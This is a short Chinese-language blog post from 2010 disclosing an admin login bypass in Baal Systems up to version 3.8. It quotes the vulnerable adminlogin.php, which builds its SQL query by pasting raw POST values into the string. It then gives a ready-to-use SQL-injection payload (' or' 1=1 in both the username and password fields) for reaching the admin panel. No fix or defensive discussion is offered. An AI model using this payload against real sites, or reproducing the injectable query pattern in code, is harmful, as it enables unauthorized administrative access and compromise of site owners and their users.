Baal Systems <= 3.8 (Auth Bypass) 后台万能登入漏洞
发布:admin | 发布时间: 2010年2月8日漏洞文件:adminlogin.php
代码: <?php
include("common.php");
if (!empty($_POST['password'])) {
$username = $_POST['username'];
$password = $_POST['password'];
$query = "select * from {$tableprefix}tbluser where username='" . $username . "' and password='" . $password . "' and userrole='admin';";
$result1 = db_query($query);
$rows = db_num_rows($result1);
$row = db_fetch_array($result1);
if ($rows != 0) {
if (session_is_registered("whossession")) {
$_SESSION['who'] = "admin";
$_SESSION['userrole'] = "admin";
$_SESSION['username'] = $username;
$_SESSION['usernum'] = $row["userid"];
header("location:admin.php");
} else {
session_register("whossession");
$_SESSION['who'] = "admin";
$_SESSION['userrole'] = "admin";
$_SESSION['username'] = $username;
$_SESSION['usernum'] = $row["userid"];
header("location:admin.php");
}
} else {
header("location:adminlogin.php?error=yes");
}
} else {
?>
利用:http://url/adminlogin.php
username: ' or' 1=1
Password: ' or' 1=1
文章如转载,请注明转载自:http://www.5iadmin.com/post/265.html
- 相关文章:
发表评论
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。
